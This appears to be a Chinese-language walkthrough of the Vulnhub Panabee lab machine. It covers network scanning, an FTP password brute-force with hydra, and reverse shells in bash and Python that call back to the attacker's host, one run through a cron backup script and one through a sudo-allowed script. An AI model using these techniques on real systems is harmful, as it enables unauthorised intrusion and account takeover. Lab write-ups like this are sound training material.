Panabee识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                                                                                                                     3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             _____________________________________________________________________________   IP            At MAC Address     Count     Len  MAC Vendor / Hostname       ----------------------------------------------------------------------------- 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                            192.168.56.100  08:00:27:cd:98:c4      1      60  PCS Systemtechnik GmbH                                                    192.168.56.228  08:00:27:2b:99:a3      1      60  PCS Systemtechnik GmbH                                                   

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.228

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scanStarting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDTNmap scan report for bogon (192.168.56.228)Host is up (0.00011s latency).Not shown: 65529 closed tcp ports (reset)PORT    STATE SERVICE     VERSION21/tcp  open  ftp         vsftpd 3.0.322/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)|   256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)|_  256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)25/tcp  open  smtp        Postfix smtpd| ssl-cert: Subject: commonName=panabee| Subject Alternative Name: DNS:panabee| Not valid before: 2020-06-14T18:25:48|_Not valid after:  2030-06-12T18:25:48|_ssl-date: TLS randomness does not represent time|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works139/tcp open  netbios-ssn Samba smbd 4.6.2445/tcp open  netbios-ssn Samba smbd 4.6.2MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)Service Info: Host:  panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: 7h59m58s|_nbstat: NetBIOS name: PANABEE, NetBIOS user: , NetBIOS MAC:  (unknown)| smb2-time: |   date: 2023-03-23T11:21:52|_  start_date: N/A| smb2-security-mode: |   3.1.1: |_    Message signing enabled but not requiredService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds                                                                 

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ smbclient //192.168.56.228/note      Password for [WORKGROUP\kali]:Try "help" to get a list of possible commands.smb: \> ls  .                                   D        0  Sun Jun 14 23:08:42 2020  ..                                  D        0  Mon Jun 15 04:59:44 2020  note.txt                            N      265  Sun Jun 14 23:08:42 2020                20508240 blocks of size 1024. 12823536 blocks availablesmb: \> get note.txt getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)smb: \> put test.txt putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)smb: \> ls -alhNT_STATUS_NO_SUCH_FILE listing \-alhsmb: \> ls  .                                   D        0  Thu Mar 23 07:23:20 2023  ..                                  D        0  Mon Jun 15 04:59:44 2020  test.txt                            A       12  Thu Mar 23 07:23:20 2023  note.txt                            N      265  Sun Jun 14 23:08:42 2020                20508240 blocks of size 1024. 12823528 blocks available

可以通过SMB上传文件

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ cat note.txt       Dear goper, I'll just leave it here as a note,Sorry for the late response,The server will now `backup` you files in your home dir,go ahead and backup anything you like, server will do it for you.Please delete this note once you've read for security measure
  1. goper是用户名?

  2. 有计划任务在执行?(定期备份文件)

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ nikto -h http://192.168.56.228- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP:          192.168.56.228+ Target Hostname:    192.168.56.228+ Target Port:        80+ Start Time:         2023-03-22 23:25:23 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.41 (Ubuntu)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS + 7915 requests: 0 error(s) and 5 item(s) reported on remote host+ End Time:           2023-03-22 23:25:52 (GMT-4) (29 seconds)---------------------------------------------------------------------------+ 1 host(s) tested      *********************************************************************      Portions of the server's headers (Apache/2.4.41) are not in      the Nikto 2.1.6 database or are newer than the known string. Would you like      to submit this information (*no server specific data*) to CIRT.net      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

目录扫描没有什么收获,接下来用hydra来破解密码

──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228         Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task[DATA] attacking ftp://192.168.56.228:21/[21][ftp] host: 192.168.56.228   login: goper   password: spiderman1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ ftp 192.168.56.228        Connected to 192.168.56.228.220 (vsFTPd 3.0.3)Name (192.168.56.228:kali): goper331 Please specify the password.Password: 230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls -alh229 Entering Extended Passive Mode (|||8003|)150 Here comes the directory listing.drwxrwxr-x    4 1000     118          4096 Jun 21  2020 .drwxrwxr-x    4 1000     118          4096 Jun 21  2020 ..-rw-------    1 1000     1000         4591 Jun 21  2020 .bash_history-rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout-rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrcdrwx------    2 1000     1000         4096 Jun 14  2020 .cachedrwxrwxr-x    3 1000     1000         4096 Jun 15  2020 .local-rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile-rw-rw-r--    1 1000     1000           66 Jun 15  2020 .selected_editor-rw-r--r--    1 1000     1000            0 Jun 14  2020 .sudo_as_admin_successful-rw-------    1 1000     1000        11134 Jun 15  2020 .viminfo-rw-r--r--    1 0        1000          332 Jun 15  2020 status.py226 Directory send OK.ftp> pwdRemote directory: /ftp> get status.pylocal: status.py remote: status.py229 Entering Extended Passive Mode (|||59411|)150 Opening BINARY mode data connection for status.py (332 bytes).100% |*********************************************************************************|   332        2.25 KiB/s    00:00 ETA226 Transfer complete.332 bytes received in 00:00 (2.23 KiB/s)ftp> put test.txt local: test.txt remote: test.txt229 Entering Extended Passive Mode (|||13323|)150 Ok to send data.100% |*********************************************************************************|    12      221.10 KiB/s    00:00 ETA226 Transfer complete.12 bytes sent in 00:00 (8.87 KiB/s)ftp> 

似乎在goper的家目录,因此可以将ssh公钥上传到目标主机

──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ ssh-keygen              Generating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): goperEnter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in goperYour public key has been saved in goper.pubThe key fingerprint is:SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kaliThe key's randomart image is:+---[RSA 3072]----+|     .   =Xo.    ||     .o += +     ||   .o +oo++ o    ||  o+.+o+oE.=oo   ||.oo+ooo.S o.==.  ||....+    . =.oo  ||   .      . +.   ||           ..    ||            ..   |+----[SHA256]-----+                                                                                                                              ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ ls     goper  goper.pub  nmap_full_scan  note.txt  status.py  test.txt
ftp> mkdir .ssh257 "/.ssh" createdftp> cd .ssh250 Directory successfully changed.ftp> put authorized_keys local: authorized_keys remote: authorized_keys229 Entering Extended Passive Mode (|||34675|)150 Ok to send data.100% |*********************************************************************************|   563       16.77 MiB/s    00:00 ETA226 Transfer complete.563 bytes sent in 00:00 (0.98 MiB/s)ftp> 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ ssh -i goper goper@192.168.56.228          The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.goper@192.168.56.228: Permission denied (publickey).                                                                           

但是目标并不允许基于私钥登录,这条路行不通

写一个bash脚本上传到ftp也就是goper的家目录,看能不能被自动执行

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ cat shell.sh bash -i >& /dev/tcp/192.168.56.146/5555 0>&1

这个bash脚本名称应该是backup.sh,才回cron执行

ftp> put backup.sh local: backup.sh remote: backup.sh229 Entering Extended Passive Mode (|||10215|)150 Ok to send data.100% |*********************************************************************************|    57      869.75 KiB/s    00:00 ETA226 Transfer complete.57 bytes sent in 00:00 (45.43 KiB/s)
─$ sudo nc -nlvp 5555listening on [any] 5555 ...connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726bash: cannot set terminal process group (3520): Inappropriate ioctl for devicebash: no job control in this shellgoper@panabee:~$ pwdpwd/home/gopergoper@panabee:~$ ls -alhls -alhtotal 72Kdrwxrwxr-x 5 goper ftp   4.0K Mar 23 11:57 .drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..-rwx--x--x 1 goper goper   57 Mar 23 11:57 backup.sh-rw------- 1 goper goper 4.5K Jun 21  2020 .bash_history-rw-r--r-- 1 goper goper  220 Feb 25  2020 .bash_logout-rw-r--r-- 1 goper goper 3.7K Feb 25  2020 .bashrcdrwx------ 2 goper goper 4.0K Jun 14  2020 .cachedrwxrwxr-x 3 goper goper 4.0K Jun 15  2020 .local-rw-r--r-- 1 goper goper  807 Feb 25  2020 .profile-rw-rw-r-- 1 goper goper   66 Jun 15  2020 .selected_editor-rw------- 1 goper goper   57 Mar 23 11:54 shell.shdrwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh-rw-r--r-- 1 root  goper  332 Jun 15  2020 status.py-rw-r--r-- 1 goper goper    0 Jun 14  2020 .sudo_as_admin_successful-rw------- 1 goper goper   12 Mar 23 11:40 test.txt-rw------- 1 goper goper  11K Jun 15  2020 .viminfogoper@panabee:~$ sudo -lsudo -lMatching Defaults entries for goper on panabee:    env_reset, mail_badpass,    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser goper may run the following commands on panabee:    (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py

可以将原有的status.py删除,然后通过FTP上传反弹shell的python脚本,从而得到jenny的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ vim status.py                                                                                                                                      ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ cat status.pypython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
goper@panabee:~$ rm -rf status.pyrm -rf status.py
ftp> put status.pylocal: status.py remote: status.py229 Entering Extended Passive Mode (|||26655|)150 Ok to send data.100% |*********************************************************************************|   232        3.35 MiB/s    00:00 ETA226 Transfer complete.232 bytes sent in 00:00 (167.32 KiB/s)ftp> 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ cat status.pyimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);                                                                                                
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.pysudo -u jenny /usr/bin/python3 /home/goper/status.py/usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission deniedgoper@panabee:~$ chmod 777 status.pychmod 777 status.pygoper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.pysudo -u jenny /usr/bin/python3 /home/goper/status.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ sudo nc -nlvp 8888listening on [any] 8888 ...connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108$ iduid=1001(jenny) gid=1001(jenny) groups=1001(jenny)$ which python3/usr/bin/python3$ python3 -c 'import pty;pty.spawn("/bin/bash")'jenny@panabee:/home/goper$ cd /homecd /homejenny@panabee:/home$ ls -alhls -alhtotal 16Kdrwxr-xr-x  4 root  root  4.0K Jun 15  2020 .drwxr-xr-x 20 root  root  4.0K Jun 15  2020 ..drwxrwxr-x  5 goper ftp   4.0K Mar 23 12:08 goperdrwx------  3 jenny jenny 4.0K Jun 15  2020 jennyjenny@panabee:/home$ cd jennycd jennyjenny@panabee:~$ ls -alhls -alhtotal 40Kdrwx------ 3 jenny jenny 4.0K Jun 15  2020 .drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..-rw------- 1 jenny jenny 2.0K Jun 30  2020 .bash_history-rw-r--r-- 1 jenny jenny  220 Feb 25  2020 .bash_logout-rw-r--r-- 1 jenny jenny 3.7K Feb 25  2020 .bashrc-rw------- 1 jenny jenny   32 Jun 15  2020 .lesshst-rw-r--r-- 1 jenny jenny  807 Feb 25  2020 .profile-rw-rw-r-- 1 jenny jenny   13 Jun 15  2020 status.txt-rw-r--r-- 1 root  root   213 Jun 15  2020 thanks_jennydrwxrwxr-x 2 root  jenny 4.0K Jun 30  2020 .tmux-0

从.bash_history知道有个secret.zip文件,将其下载到Kali Linux本地

但是破解失败,本靶机的提权需要利用.tmux进行

提权

cd /root# ls -alhls -alhtotal 80Kdrwx------  5 root root 4.0K Jun 30  2020 .drwxr-xr-x 20 root root 4.0K Jun 15  2020 ..-rw-------  1 root root  18K Jun 30  2020 .bash_history-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrcdrwx------  2 root root 4.0K Jun 14  2020 .cache-rw-------  1 root root   38 Jun 30  2020 .lesshstdrwxr-xr-x  3 root root 4.0K Jun 14  2020 .local-rw-r--r--  1 root root  161 Dec  5  2019 .profile-rw-r--r--  1 root root  239 Jun 15  2020 proof.txt-rw-r--r--  1 root root   66 Jun 15  2020 .selected_editordrwx------  2 root root 4.0K Jun 14  2020 .ssh-rw-------  1 root root  13K Jun 21  2020 .viminfo __                  __   ___  ___    |__)  /\  |\ |  /\  |__) |__  |__     |    /~~\ | \| /~~\ |__) |___ |___                                          

STRIVE FOR PROGRESS,NOT FOR PERFECTION